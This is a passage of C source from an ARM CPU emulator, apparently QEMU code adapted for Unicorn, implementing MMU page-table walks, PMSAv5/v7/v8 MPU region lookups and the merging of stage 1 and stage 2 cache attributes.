ARMFault_Translation; goto do_fault; } } if (param.using64k) { stride = 13; } else if (param.using16k) { stride = 11; } else { stride = 9; } /* Note that QEMU ignores shareability and cacheability attributes, * so we don't need to do anything with the SH, ORGN, IRGN fields * in the TTBCR. Similarly, TTBCR:A1 selects whether we get the * ASID from TTBR0 or TTBR1, but QEMU's TLB doesn't currently * implement any ASID-like capability so we can ignore it (instead * we will always flush the TLB any time the ASID is changed). */ ttbr = regime_ttbr(env, mmu_idx, param.select); /* Here we should have set up all the parameters for the translation: * inputsize, ttbr, epd, stride, tbi */ if (param.epd) { /* Translation table walk disabled => Translation fault on TLB miss * Note: This is always 0 on 64-bit EL2 and EL3. 
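* (param.epd reflects TCR.EPD0 or TCR.EPD1 for the selected half of the address space, as extracted in aa64_va_parameters/aa32_va_parameters above.)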
*/ goto do_fault; } if (mmu_idx != ARMMMUIdx_Stage2) { /* The starting level depends on the virtual address size (which can * be up to 48 bits) and the translation granule size. It indicates * the number of strides (stride bits at a time) needed to * consume the bits of the input address. In the pseudocode this is: * level = 4 - RoundUp((inputsize - grainsize) / stride) * where their 'inputsize' is our 'inputsize', 'grainsize' is * our 'stride + 3' and 'stride' is our 'stride'. * Applying the usual "rounded up m/n is (m+n-1)/n" and simplifying: * = 4 - (inputsize - stride - 3 + stride - 1) / stride * = 4 - (inputsize - 4) / stride; */ level = 4 - (inputsize - 4) / stride; } else { /* For stage 2 translations the starting level is specified by the * VTCR_EL2.SL0 field (whose interpretation depends on the page size) */ uint32_t sl0 = extract32(tcr->raw_tcr, 6, 2); uint32_t startlevel; bool ok; if (!aarch64 || stride == 9) { /* AArch32 or 4KB pages */ startlevel = 2 - sl0; } else { /* 16KB or 64KB pages */ startlevel = 3 - sl0; } /* Check that the starting level is valid. */ ok = check_s2_mmu_setup(cpu, aarch64, startlevel, inputsize, stride); if (!ok) { fault_type = ARMFault_Translation; goto do_fault; } level = startlevel; } indexmask_grainsize = (1ULL << (stride + 3)) - 1; indexmask = (1ULL << (inputsize - (stride * (4 - level)))) - 1; /* Now we can extract the actual base address from the TTBR */ descaddr = extract64(ttbr, 0, 48); /* * We rely on this masking to clear the RES0 bits at the bottom of the TTBR * and also to mask out CnP (bit 0) which could validly be non-zero. */ descaddr &= ~indexmask; /* The address field in the descriptor goes up to bit 39 for ARMv7 * but up to bit 47 for ARMv8, but we use the descaddrmask * up to bit 39 for AArch32, because we don't need other bits in that case * to construct next descriptor address (anyway they should be all zeroes). */ descaddrmask = ((1ull << (aarch64 ? 48 : 40)) - 1) & ~indexmask_grainsize; /* Secure accesses start with the page table in secure memory and * can be downgraded to non-secure at any step. Non-secure accesses * remain non-secure. We implement this by just ORing in the NSTable/NS * bits at each step. */ tableattrs = regime_is_secure(env, mmu_idx) ? 0 : (1 << 4); for (;;) { uint64_t descriptor; bool nstable; descaddr |= (address >> (stride * (4 - level))) & indexmask; descaddr &= ~7ULL; nstable = extract32(tableattrs, 4, 1); descriptor = arm_ldq_ptw(cs, descaddr, !nstable, mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } if (!(descriptor & 1) || (!(descriptor & 2) && (level == 3))) { /* Invalid, or the Reserved level 3 encoding */ goto do_fault; } descaddr = descriptor & descaddrmask; if ((descriptor & 2) && (level < 3)) { /* Table entry. The top five bits are attributes which may * propagate down through lower levels of the table (and * which are all arranged so that 0 means "no effect", so * we can gather them up by ORing in the bits at each level). */ tableattrs |= extract64(descriptor, 59, 5); level++; indexmask = indexmask_grainsize; continue; } /* Block entry at level 1 or 2, or page entry at level 3. * These are basically the same thing, although the number * of bits we pull in from the vaddr varies. 
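* As a worked example, with 4KB granules (stride == 9) a level 2 block covers 1 << (9 * 2 + 3) == 2MB and a level 3 page covers 1 << (9 + 3) == 4KB, matching the page_size computation below.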
*/ page_size = (1ULL << ((stride * (4 - level)) + 3)); descaddr |= (address & (page_size - 1)); /* Extract attributes from the descriptor */ attrs = extract64(descriptor, 2, 10) | (extract64(descriptor, 52, 12) << 10); if (mmu_idx == ARMMMUIdx_Stage2) { /* Stage 2 table descriptors do not include any attribute fields */ break; } /* Merge in attributes from table descriptors */ attrs |= nstable << 3; /* NS */ guarded = extract64(descriptor, 50, 1); /* GP */ if (param.hpd) { /* HPD disables all the table attributes except NSTable. */ break; } attrs |= extract32(tableattrs, 0, 2) << 11; /* XN, PXN */ /* The sense of AP[1] vs APTable[0] is reversed, as APTable[0] == 1 * means "force PL1 access only", which means forcing AP[1] to 0. */ attrs &= ~(extract32(tableattrs, 2, 1) << 4); /* !APT[0] => AP[1] */ attrs |= extract32(tableattrs, 3, 1) << 5; /* APT[1] => AP[2] */ break; } /* Here descaddr is the final physical address, and attributes * are all in attrs. */ fault_type = ARMFault_AccessFlag; if ((attrs & (1 << 8)) == 0) { /* Access flag */ goto do_fault; } ap = extract32(attrs, 4, 2); xn = extract32(attrs, 12, 1); if (mmu_idx == ARMMMUIdx_Stage2) { ns = true; *prot = get_S2prot(env, ap, xn); } else { ns = extract32(attrs, 3, 1); pxn = extract32(attrs, 11, 1); *prot = get_S1prot(env, mmu_idx, aarch64, ap, ns, xn, pxn); } fault_type = ARMFault_Permission; if (!(*prot & (1 << access_type))) { goto do_fault; } if (ns) { /* The NS bit will (as required by the architecture) have no effect if * the CPU doesn't support TZ or this is a non-secure translation * regime, because the attribute will already be non-secure. */ txattrs->secure = false; } /* When in aarch64 mode, and BTI is enabled, remember GP in the IOTLB. */ if (aarch64 && guarded && cpu_isar_feature(aa64_bti, cpu)) { txattrs->target_tlb_bit0 = true; } if (cacheattrs != NULL) { if (mmu_idx == ARMMMUIdx_Stage2) { cacheattrs->attrs = convert_stage2_attrs(env, extract32(attrs, 0, 4)); } else { /* Index into MAIR registers for cache attributes */ uint8_t attrindx = extract32(attrs, 0, 3); uint64_t mair = env->cp15.mair_el[regime_el(env, mmu_idx)]; assert(attrindx <= 7); cacheattrs->attrs = extract64(mair, attrindx * 8, 8); } cacheattrs->shareability = extract32(attrs, 6, 2); } *phys_ptr = descaddr; *page_size_ptr = page_size; return false; do_fault: fi->type = fault_type; fi->level = level; /* Tag the error as S2 for failed S1 PTW at S2 or ordinary S2. */ fi->stage2 = fi->s1ptw || (mmu_idx == ARMMMUIdx_Stage2); return true; } static inline void get_phys_addr_pmsav7_default(CPUARMState *env, ARMMMUIdx mmu_idx, int32_t address, int *prot) { #define XRANGE(a, x, y) ((a) >= (x) && (a) <= (y)) if (!arm_feature(env, ARM_FEATURE_M)) { *prot = PAGE_READ | PAGE_WRITE; if (XRANGE(address, 0xF0000000, 0xFFFFFFFF)) { if (regime_sctlr(env, mmu_idx) & SCTLR_V) { /* hivecs execing is ok */ *prot |= PAGE_EXEC; } } else if (XRANGE(address, 0x00000000, 0x7FFFFFFF)) { *prot |= PAGE_EXEC; } } else { /* Default system address map for M profile cores. * The architecture specifies which regions are execute-never; * at the MPU level no other checks are defined.
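* For instance, in the map below the ROM/SRAM/RAM spaces (0x00000000 through 0x9fffffff) come out read/write/execute, while the peripheral, device and system spaces are read/write but execute-never.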
*/ if (XRANGE(address, 0x00000000, 0x1fffffff) || /* ROM */ XRANGE(address, 0x20000000, 0x3fffffff) || /* SRAM */ XRANGE(address, 0x60000000, 0x7fffffff) || /* RAM */ XRANGE(address, 0x80000000, 0x9fffffff)) /* RAM */ *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; else if (XRANGE(address, 0x40000000, 0x5fffffff) || /* Peripheral */ XRANGE(address, 0xa0000000, 0xbfffffff) || /* Device */ XRANGE(address, 0xc0000000, 0xdfffffff) || /* Device */ XRANGE(address, 0xe0000000, 0xffffffff)) /* System */ *prot = PAGE_READ | PAGE_WRITE; } #undef XRANGE } static bool pmsav7_use_background_region(ARMCPU *cpu, ARMMMUIdx mmu_idx, bool is_user) { /* Return true if we should use the default memory map as a * "background" region if there are no hits against any MPU regions. */ CPUARMState *env = &cpu->env; if (is_user) { return false; } if (arm_feature(env, ARM_FEATURE_M)) { return env->v7m.mpu_ctrl[regime_is_secure(env, mmu_idx)] & R_V7M_MPU_CTRL_PRIVDEFENA_MASK; } else { return regime_sctlr(env, mmu_idx) & SCTLR_BR; } } static inline bool m_is_ppb_region(CPUARMState *env, uint32_t address) { /* True if address is in the M profile PPB region 0xe0000000 - 0xe00fffff */ return arm_feature(env, ARM_FEATURE_M) && extract32(address, 20, 12) == 0xe00; } static inline bool m_is_system_region(CPUARMState *env, uint32_t address) { /* True if address is in the M profile system region * 0xe0000000 - 0xffffffff */ return arm_feature(env, ARM_FEATURE_M) && extract32(address, 29, 3) == 0x7; } static bool get_phys_addr_pmsav7(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { struct uc_struct *uc = env->uc; ARMCPU *cpu = env_archcpu(env); int n; bool is_user = regime_is_user(env, mmu_idx); *phys_ptr = address; *page_size = TARGET_PAGE_SIZE; *prot = 0; if (regime_translation_disabled(env, mmu_idx) || m_is_ppb_region(env, address)) { /* MPU disabled or M profile PPB access: use default memory map. * The other case which uses the default memory map in the * v7M ARM ARM pseudocode is exception vector reads from the vector * table. In QEMU those accesses are done in arm_v7m_load_vector(), * which always does a direct read using address_space_ldl(), rather * than going via this function, so we don't need to check that here. */ get_phys_addr_pmsav7_default(env, mmu_idx, address, prot); } else { /* MPU enabled */ for (n = (int)cpu->pmsav7_dregion - 1; n >= 0; n--) { /* region search */ uint32_t base = env->pmsav7.drbar[n]; uint32_t rsize = extract32(env->pmsav7.drsr[n], 1, 5); uint32_t rmask; bool srdis = false; if (!(env->pmsav7.drsr[n] & 0x1)) { continue; } if (!rsize) { qemu_log_mask(LOG_GUEST_ERROR, "DRSR[%d]: Rsize field cannot be 0\n", n); continue; } rsize++; rmask = (1ull << rsize) - 1; if (base & rmask) { qemu_log_mask(LOG_GUEST_ERROR, "DRBAR[%d]: 0x%" PRIx32 " misaligned " "to DRSR region size, mask = 0x%" PRIx32 "\n", n, base, rmask); continue; } if (address < base || address > base + rmask) { /* * Address not in this region. We must check whether the * region covers addresses in the same page as our address. * In that case we must not report a size that covers the * whole page for a subsequent hit against a different MPU * region or the background region, because it would result in * incorrect TLB hits for subsequent accesses to addresses that * are in this MPU region. 
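* Concretely (hypothetical numbers): a 64-byte region at 0x20000040 forces *page_size down to 1 for an access to, say, 0x20000000, so the resulting TLB entry cannot shadow the region's own addresses.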
*/ if (ranges_overlap(base, rmask, address & TARGET_PAGE_MASK, TARGET_PAGE_SIZE)) { *page_size = 1; } continue; } /* Region matched */ if (rsize >= 8) { /* no subregions for regions < 256 bytes */ int i, snd; uint32_t srdis_mask; rsize -= 3; /* sub region size (power of 2) */ snd = ((address - base) >> rsize) & 0x7; srdis = extract32(env->pmsav7.drsr[n], snd + 8, 1); srdis_mask = srdis ? 0x3 : 0x0; for (i = 2; i <= 8 && rsize < TARGET_PAGE_BITS; i *= 2) { /* This will check in groups of 2, 4 and then 8, whether * the subregion bits are consistent. rsize is incremented * back up to give the region size, considering consistent * adjacent subregions as one region. Stop testing if rsize * is already big enough for an entire QEMU page. */ int snd_rounded = snd & ~(i - 1); uint32_t srdis_multi = extract32(env->pmsav7.drsr[n], snd_rounded + 8, i); if (srdis_mask ^ srdis_multi) { break; } srdis_mask = (srdis_mask << i) | srdis_mask; rsize++; } } if (srdis) { continue; } if (rsize < TARGET_PAGE_BITS) { *page_size = 1ULL << rsize; } break; } if (n == -1) { /* no hits */ if (!pmsav7_use_background_region(cpu, mmu_idx, is_user)) { /* background fault */ fi->type = ARMFault_Background; return true; } get_phys_addr_pmsav7_default(env, mmu_idx, address, prot); } else { /* a MPU hit! */ uint32_t ap = extract32(env->pmsav7.dracr[n], 8, 3); uint32_t xn = extract32(env->pmsav7.dracr[n], 12, 1); if (m_is_system_region(env, address)) { /* System space is always execute never */ xn = 1; } if (is_user) { /* User mode AP bit decoding */ switch (ap) { case 0: case 1: case 5: break; /* no access */ case 3: *prot |= PAGE_WRITE; /* fall through */ case 2: case 6: *prot |= PAGE_READ | PAGE_EXEC; break; case 7: /* for v7M, same as 6; for R profile a reserved value */ if (arm_feature(env, ARM_FEATURE_M)) { *prot |= PAGE_READ | PAGE_EXEC; break; } /* fall through */ default: qemu_log_mask(LOG_GUEST_ERROR, "DRACR[%d]: Bad value for AP bits: 0x%" PRIx32 "\n", n, ap); } } else { /* Priv. mode AP bits decoding */ switch (ap) { case 0: break; /* no access */ case 1: case 2: case 3: *prot |= PAGE_WRITE; /* fall through */ case 5: case 6: *prot |= PAGE_READ | PAGE_EXEC; break; case 7: /* for v7M, same as 6; for R profile a reserved value */ if (arm_feature(env, ARM_FEATURE_M)) { *prot |= PAGE_READ | PAGE_EXEC; break; } /* fall through */ default: qemu_log_mask(LOG_GUEST_ERROR, "DRACR[%d]: Bad value for AP bits: 0x%" PRIx32 "\n", n, ap); } } /* execute never */ if (xn) { *prot &= ~PAGE_EXEC; } } } fi->type = ARMFault_Permission; fi->level = 1; return !(*prot & (1 << access_type)); } void v8m_security_lookup(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, V8M_SAttributes *sattrs) { #if 0 /* Look up the security attributes for this address. Compare the * pseudocode SecurityCheck() function. * We assume the caller has zero-initialized *sattrs. 
*/ ARMCPU *cpu = env_archcpu(env); int r; bool idau_exempt = false, idau_ns = true, idau_nsc = true; int idau_region = IREGION_NOTVALID; uint32_t addr_page_base = address & TARGET_PAGE_MASK; uint32_t addr_page_limit = addr_page_base + (TARGET_PAGE_SIZE - 1); if (cpu->idau) { IDAUInterfaceClass *iic = IDAU_INTERFACE_GET_CLASS(cpu->idau); IDAUInterface *ii = IDAU_INTERFACE(cpu->idau); iic->check(ii, address, &idau_region, &idau_exempt, &idau_ns, &idau_nsc); } if (access_type == MMU_INST_FETCH && extract32(address, 28, 4) == 0xf) { /* 0xf0000000..0xffffffff is always S for insn fetches */ return; } if (idau_exempt || v8m_is_sau_exempt(env, address, access_type)) { sattrs->ns = !regime_is_secure(env, mmu_idx); return; } if (idau_region != IREGION_NOTVALID) { sattrs->irvalid = true; sattrs->iregion = idau_region; } switch (env->sau.ctrl & 3) { case 0: /* SAU.ENABLE == 0, SAU.ALLNS == 0 */ break; case 2: /* SAU.ENABLE == 0, SAU.ALLNS == 1 */ sattrs->ns = true; break; default: /* SAU.ENABLE == 1 */ for (r = 0; r < cpu->sau_sregion; r++) { if (env->sau.rlar[r] & 1) { uint32_t base = env->sau.rbar[r] & ~0x1f; uint32_t limit = env->sau.rlar[r] | 0x1f; if (base <= address && limit >= address) { if (base > addr_page_base || limit < addr_page_limit) { sattrs->subpage = true; } if (sattrs->srvalid) { /* If we hit in more than one region then we must report * as Secure, not NS-Callable, with no valid region * number info. */ sattrs->ns = false; sattrs->nsc = false; sattrs->sregion = 0; sattrs->srvalid = false; break; } else { if (env->sau.rlar[r] & 2) { sattrs->nsc = true; } else { sattrs->ns = true; } sattrs->srvalid = true; sattrs->sregion = r; } } else { /* * Address not in this region. We must check whether the * region covers addresses in the same page as our address. * In that case we must not report a size that covers the * whole page for a subsequent hit against a different MPU * region or the background region, because it would result * in incorrect TLB hits for subsequent accesses to * addresses that are in this MPU region. */ if (limit >= base && ranges_overlap(base, limit - base + 1, addr_page_base, TARGET_PAGE_SIZE)) { sattrs->subpage = true; } } } } break; } /* * The IDAU will override the SAU lookup results if it specifies * higher security than the SAU does. */ if (!idau_ns) { if (sattrs->ns || (!idau_nsc && sattrs->nsc)) { sattrs->ns = false; sattrs->nsc = idau_nsc; } } #endif } bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, bool *is_subpage, ARMMMUFaultInfo *fi, uint32_t *mregion) { struct uc_struct *uc = env->uc; /* Perform a PMSAv8 MPU lookup (without also doing the SAU check * that a full phys-to-virt translation does). * mregion is (if not NULL) set to the region number which matched, * or -1 if no region number is returned (MPU off, address did not * hit a region, address hit in multiple regions). * We set is_subpage to true if the region hit doesn't cover the * entire TARGET_PAGE the address is within. 
*/ ARMCPU *cpu = env_archcpu(env); bool is_user = regime_is_user(env, mmu_idx); uint32_t secure = regime_is_secure(env, mmu_idx); int n; int matchregion = -1; bool hit = false; uint32_t addr_page_base = address & TARGET_PAGE_MASK; uint32_t addr_page_limit = addr_page_base + (TARGET_PAGE_SIZE - 1); *is_subpage = false; *phys_ptr = address; *prot = 0; if (mregion) { *mregion = -1; } /* Unlike the ARM ARM pseudocode, we don't need to check whether this * was an exception vector read from the vector table (which is always * done using the default system address map), because those accesses * are done in arm_v7m_load_vector(), which always does a direct * read using address_space_ldl(), rather than going via this function. */ if (regime_translation_disabled(env, mmu_idx)) { /* MPU disabled */ hit = true; } else if (m_is_ppb_region(env, address)) { hit = true; } else { if (pmsav7_use_background_region(cpu, mmu_idx, is_user)) { hit = true; } for (n = (int)cpu->pmsav7_dregion - 1; n >= 0; n--) { /* region search */ /* Note that the base address is bits [31:5] from the register * with bits [4:0] all zeroes, but the limit address is bits * [31:5] from the register with bits [4:0] all ones. */ uint32_t base = env->pmsav8.rbar[secure][n] & ~0x1f; uint32_t limit = env->pmsav8.rlar[secure][n] | 0x1f; if (!(env->pmsav8.rlar[secure][n] & 0x1)) { /* Region disabled */ continue; } if (address < base || address > limit) { /* * Address not in this region. We must check whether the * region covers addresses in the same page as our address. * In that case we must not report a size that covers the * whole page for a subsequent hit against a different MPU * region or the background region, because it would result in * incorrect TLB hits for subsequent accesses to addresses that * are in this MPU region. */ if (limit >= base && ranges_overlap(base, limit - base + 1, addr_page_base, TARGET_PAGE_SIZE)) { *is_subpage = true; } continue; } if (base > addr_page_base || limit < addr_page_limit) { *is_subpage = true; } if (matchregion != -1) { /* Multiple regions match -- always a failure (unlike * PMSAv7 where highest-numbered-region wins) */ fi->type = ARMFault_Permission; fi->level = 1; return true; } matchregion = n; hit = true; } } if (!hit) { /* background fault */ fi->type = ARMFault_Background; return true; } if (matchregion == -1) { /* hit using the background region */ get_phys_addr_pmsav7_default(env, mmu_idx, address, prot); } else { uint32_t ap = extract32(env->pmsav8.rbar[secure][matchregion], 1, 2); uint32_t xn = extract32(env->pmsav8.rbar[secure][matchregion], 0, 1); if (m_is_system_region(env, address)) { /* System space is always execute never */ xn = 1; } *prot = simple_ap_to_rw_prot(env, mmu_idx, ap); if (*prot && !xn) { *prot |= PAGE_EXEC; } /* We don't need to look the attribute up in the MAIR0/MAIR1 * registers because that only tells us about cacheability. 
*/ if (mregion) { *mregion = matchregion; } } fi->type = ARMFault_Permission; fi->level = 1; return !(*prot & (1 << access_type)); } static bool get_phys_addr_pmsav8(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { struct uc_struct *uc = env->uc; uint32_t secure = regime_is_secure(env, mmu_idx); V8M_SAttributes sattrs = { 0 }; bool ret; bool mpu_is_subpage; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { v8m_security_lookup(env, address, access_type, mmu_idx, &sattrs); if (access_type == MMU_INST_FETCH) { /* Instruction fetches always use the MMU bank and the * transaction attribute determined by the fetch address, * regardless of CPU state. This is painful for QEMU * to handle, because it would mean we need to encode * into the mmu_idx not just the (user, negpri) information * for the current security state but also that for the * other security state, which would balloon the number * of mmu_idx values needed alarmingly. * Fortunately we can avoid this because it's not actually * possible to arbitrarily execute code from memory with * the wrong security attribute: it will always generate * an exception of some kind or another, apart from the * special case of an NS CPU executing an SG instruction * in S&NSC memory. So we always just fail the translation * here and sort things out in the exception handler * (including possibly emulating an SG instruction). */ if (sattrs.ns != !secure) { if (sattrs.nsc) { fi->type = ARMFault_QEMU_NSCExec; } else { fi->type = ARMFault_QEMU_SFault; } *page_size = sattrs.subpage ? 1 : TARGET_PAGE_SIZE; *phys_ptr = address; *prot = 0; return true; } } else { /* For data accesses we always use the MMU bank indicated * by the current CPU state, but the security attributes * might downgrade a secure access to nonsecure. */ if (sattrs.ns) { txattrs->secure = false; } else if (!secure) { /* NS access to S memory must fault. * Architecturally we should first check whether the * MPU information for this address indicates that we * are doing an unaligned access to Device memory, which * should generate a UsageFault instead. QEMU does not * currently check for that kind of unaligned access though. * If we added it we would need to do so as a special case * for M_FAKE_FSR_SFAULT in arm_v7m_cpu_do_interrupt(). */ fi->type = ARMFault_QEMU_SFault; *page_size = sattrs.subpage ? 1 : TARGET_PAGE_SIZE; *phys_ptr = address; *prot = 0; return true; } } } ret = pmsav8_mpu_lookup(env, address, access_type, mmu_idx, phys_ptr, txattrs, prot, &mpu_is_subpage, fi, NULL); *page_size = sattrs.subpage || mpu_is_subpage ? 1 : TARGET_PAGE_SIZE; return ret; } static bool get_phys_addr_pmsav5(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, int *prot, ARMMMUFaultInfo *fi) { int n; uint32_t mask; uint32_t base; bool is_user = regime_is_user(env, mmu_idx); if (regime_translation_disabled(env, mmu_idx)) { /* MPU disabled. */ *phys_ptr = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return false; } *phys_ptr = address; for (n = 7; n >= 0; n--) { base = env->cp15.c6_region[n]; if ((base & 1) == 0) { continue; } mask = 1 << ((base >> 1) & 0x1f); /* Keep this shift separate from the above to avoid an (undefined) << 32. 
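* Worked example: a maximal size field of 31 yields mask = 1 << 31 here; the (mask << 1) - 1 below then wraps to 0xffffffff in uint32_t arithmetic, whereas a single 1 << 32 would be undefined.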
*/ mask = (mask << 1) - 1; if (((base ^ address) & ~mask) == 0) { break; } } if (n < 0) { fi->type = ARMFault_Background; return true; } if (access_type == MMU_INST_FETCH) { mask = env->cp15.pmsav5_insn_ap; } else { mask = env->cp15.pmsav5_data_ap; } mask = (mask >> (n * 4)) & 0xf; switch (mask) { case 0: fi->type = ARMFault_Permission; fi->level = 1; return true; case 1: if (is_user) { fi->type = ARMFault_Permission; fi->level = 1; return true; } *prot = PAGE_READ | PAGE_WRITE; break; case 2: *prot = PAGE_READ; if (!is_user) { *prot |= PAGE_WRITE; } break; case 3: *prot = PAGE_READ | PAGE_WRITE; break; case 5: if (is_user) { fi->type = ARMFault_Permission; fi->level = 1; return true; } *prot = PAGE_READ; break; case 6: *prot = PAGE_READ; break; default: /* Bad permission. */ fi->type = ARMFault_Permission; fi->level = 1; return true; } *prot |= PAGE_EXEC; return false; } /* Combine either inner or outer cacheability attributes for normal * memory, according to table D4-42 and pseudocode procedure * CombineS1S2AttrHints() of ARM DDI 0487B.b (the ARMv8 ARM). * * NB: only stage 1 includes allocation hints (RW bits), leading to * some asymmetry. */ static uint8_t combine_cacheattr_nibble(uint8_t s1, uint8_t s2) { if (s1 == 4 || s2 == 4) { /* non-cacheable has precedence */ return 4; } else if (extract32(s1, 2, 2) == 0 || extract32(s1, 2, 2) == 2) { /* stage 1 write-through takes precedence */ return s1; } else if (extract32(s2, 2, 2) == 2) { /* stage 2 write-through takes precedence, but the allocation hint * is still taken from stage 1 */ return (2 << 2) | extract32(s1, 0, 2); } else { /* write-back */ return s1; } } /* Combine S1 and S2 cacheability/shareability attributes, per D4.5.4 * and CombineS1S2Desc() * * @s1: Attributes from stage 1 walk * @s2: Attributes from stage 2 walk */ static ARMCacheAttrs combine_cacheattrs(ARMCacheAttrs s1, ARMCacheAttrs s2) { uint8_t s1lo = extract32(s1.attrs, 0, 4), s2lo = extract32(s2.attrs, 0, 4); uint8_t s1hi = extract32(s1.attrs, 4, 4), s2hi = extract32(s2.attrs, 4, 4); ARMCacheAttrs ret; /* Combine shareability attributes (table D4-43) */ if (s1.shareability == 2 || s2.shareability == 2) { /* if either are outer-shareable, the result is outer-shareable */ ret.shareability = 2; } else if (s1.shareability == 3 || s2.shareability == 3) { /* if either are inner-shareable, the result is inner-shareable */ ret.shareability = 3; } else { /* both non-shareable */ ret.shareability = 0; } /* Combine memory type and cacheability attributes */ if (s1hi == 0 || s2hi == 0) { /* Device has precedence over normal */ if (s1lo == 0 || s2lo == 0) { /* nGnRnE has precedence over anything */ ret.attrs = 0; } else if (s1lo == 4 || s2lo == 4) { /* non-Reordering has precedence over Reordering */ ret.attrs = 4; /* nGnRE */ } else if (s1lo == 8 || s2lo == 8) { /* non-Gathering has precedence over Gathering */ ret.attrs = 8; /* nGRE */ } else { ret.attrs = 0xc; /* GRE */ } /* Any location for which the resultant memory type is any * type of Device memory is always treated as Outer Shareable. */ ret.shareability = 2; } else { /* Normal memory */ /* Outer/inner cacheability combine independently */ ret.attrs = combine_cacheattr_nibble(s1hi, s2hi) << 4 | combine_cacheattr_nibble(s1lo, s2lo); if (ret.attrs == 0x44) { /* Any location for which the resultant memory type is Normal * Inner Non-cacheable, Outer Non-cacheable is always treated * as Outer Shareable. 
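* (0x44 decodes as outer == 0b0100 and inner == 0b0100, i.e. Normal Non-cacheable in both halves per combine_cacheattr_nibble above.)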
*/ ret.shareability = 2; } } return ret; } /* get_phys_addr - get the physical address for this virtual address * * Find the physical address corresponding to the given virtual address, * by doing a translation table walk on MMU based systems or using the * MPU state on MPU based systems. * * Returns false if the translation was successful. Otherwise, phys_ptr, attrs, * prot and page_size may not be filled in, and the fault information * populated in @fi describes why the translation aborted, corresponding to * a DFSR/IFSR fault register value, with the following caveats: * * we honour the short vs long DFSR format differences. * * the WnR bit is never set (the caller must do this). * * for PMSAv5 based systems we don't bother to return a full FSR format * value. * * @env: CPUARMState * @address: virtual address to get physical address for * @access_type: 0 for read, 1 for write, 2 for execute * @mmu_idx: MMU index indicating required translation regime * @phys_ptr: set to the physical address corresponding to the virtual address * @attrs: set to the memory transaction attributes to use * @prot: set to the permissions for the page containing phys_ptr * @page_size: set to the size of the page containing phys_ptr * @fi: set to fault info if the translation fails * @cacheattrs: (if non-NULL) set to the cacheability/shareability attributes */ bool get_phys_addr(CPUARMState *env, target_ulong address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *attrs, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs) { struct uc_struct *uc = env->uc; if (mmu_idx == ARMMMUIdx_E10_0 || mmu_idx == ARMMMUIdx_E10_1 || mmu_idx == ARMMMUIdx_E10_1_PAN) { /* Call ourselves recursively to do the stage 1 and then stage 2 * translations. */ if (arm_feature(env, ARM_FEATURE_EL2)) { hwaddr ipa; int s2_prot; int ret; ARMCacheAttrs cacheattrs2 = { 0 }; ret = get_phys_addr(env, address, access_type, stage_1_mmu_idx(mmu_idx), &ipa, attrs, prot, page_size, fi, cacheattrs); /* If S1 fails or S2 is disabled, return early. */ if (ret || regime_translation_disabled(env, ARMMMUIdx_Stage2)) { *phys_ptr = ipa; return ret; } /* S1 is done. Now do S2 translation. */ ret = get_phys_addr_lpae(env, ipa, access_type, ARMMMUIdx_Stage2, phys_ptr, attrs, &s2_prot, page_size, fi, cacheattrs != NULL ? &cacheattrs2 : NULL); fi->s2addr = ipa; /* Combine the S1 and S2 perms. */ *prot &= s2_prot; /* Combine the S1 and S2 cache attributes, if needed */ if (!ret && cacheattrs != NULL) { if (env->cp15.hcr_el2 & HCR_DC) { /* * HCR.DC forces the first stage attributes to * Normal Non-Shareable, * Inner Write-Back Read-Allocate Write-Allocate, * Outer Write-Back Read-Allocate Write-Allocate. */ cacheattrs->attrs = 0xff; cacheattrs->shareability = 0; } *cacheattrs = combine_cacheattrs(*cacheattrs, cacheattrs2); } return ret; } else { /* * For non-EL2 CPUs a stage1+stage2 translation is just stage 1. */ mmu_idx = stage_1_mmu_idx(mmu_idx); } } /* The page table entries may downgrade secure to non-secure, but * cannot upgrade a non-secure translation regime's attributes * to secure. */ attrs->secure = regime_is_secure(env, mmu_idx); attrs->user = regime_is_user(env, mmu_idx); /* Fast Context Switch Extension. This doesn't exist at all in v8. * In v7 and earlier it affects all stage 1 translations.
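* Worked example (hypothetical values): a VA below 32MB such as 0x1000, with FCSEIDR holding 0x02000000, is remapped to MVA 0x02001000 by the addition below.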
*/ if (address < 0x02000000 && mmu_idx != ARMMMUIdx_Stage2 && !arm_feature(env, ARM_FEATURE_V8)) { if (regime_el(env, mmu_idx) == 3) { address += env->cp15.fcseidr_s; } else { address += env->cp15.fcseidr_ns; } } if (arm_feature(env, ARM_FEATURE_PMSA)) { bool ret; *page_size = TARGET_PAGE_SIZE; if (arm_feature(env, ARM_FEATURE_V8)) { /* PMSAv8 */ ret = get_phys_addr_pmsav8(env, address, access_type, mmu_idx, phys_ptr, attrs, prot, page_size, fi); } else if (arm_feature(env, ARM_FEATURE_V7)) { /* PMSAv7 */ ret = get_phys_addr_pmsav7(env, address, access_type, mmu_idx, phys_ptr, prot, page_size, fi); } else { /* Pre-v7 MPU */ ret = get_phys_addr_pmsav5(env, address, access_type, mmu_idx, phys_ptr, prot, fi); } qemu_log_mask(CPU_LOG_MMU, "PMSA MPU lookup for %s at 0x%08" PRIx32 " mmu_idx %u -> %s (prot %c%c%c)\n", access_type == MMU_DATA_LOAD ? "reading" : (access_type == MMU_DATA_STORE ? "writing" : "execute"), (uint32_t)address, mmu_idx, ret ? "Miss" : "Hit", *prot & PAGE_READ ? 'r' : '-', *prot & PAGE_WRITE ? 'w' : '-', *prot & PAGE_EXEC ? 'x' : '-'); return ret; } /* Definitely a real MMU, not an MPU */ if (regime_translation_disabled(env, mmu_idx)) { /* * MMU disabled. S1 addresses within aa64 translation regimes are * still checked for bounds -- see AArch64.TranslateAddressS1Off. */ if (mmu_idx != ARMMMUIdx_Stage2) { int r_el = regime_el(env, 